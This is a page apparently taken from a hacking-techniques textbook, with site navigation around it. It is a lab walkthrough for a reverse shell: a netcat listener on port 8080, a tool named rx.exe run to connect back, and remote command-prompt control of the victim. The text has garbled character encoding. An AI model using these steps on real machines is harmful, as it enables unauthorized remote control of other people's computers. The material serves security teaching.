Prev | Current Page 193 | Next

Mark D. Spivey

"Practical Hacking Techniques and Countermeasures"


 Default port from which it connects: 443
 Default port to which it connects: 8080
Procedure: Start a listening netcat session on the attacker??™s machine, then
execute on the target.
Verify the IP address of the attacker??™s machine by typing ipconfig (Windows)
or ifconfig (Linux).
Wireless  597
Verify the IP address of the victim??™s machine by typing ipconfig (Windows)
or ifconfig (Linux).
On the attacker??™s machine start a netcat listening session for port 8080 by typing:
nc ??“l ??“n ??“v ??“p 8080
598  Practical Hacking Techniques and Countermeasures
When you press Enter, netcat will begin listening for connections on port 8080.
On the attacker??™s machine, initiate the rx.exe and have it connect back to
the attacker by typing:
rx
Wireless  599
You will be shown the command prompt once you press Enter. Users
might believe it did not work. (Check the attacker??™s machine next.)
Notice that the attacker??™s machine is now showing that a connection has been
made and displays a command prompt. (Could this be the victim??™s computer?)
600  Practical Hacking Techniques and Countermeasures
Type ipconfig (Windows) or ifconfig (Linux) to verify the IP address. You
will be looking at the IP address of the victim??™s computer. You may now type
away as if you are sitting behind the keyboard of the target computer.
Once the attacker wants to break the connection, he or she will type exit
and press Enter.


Pages:
181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205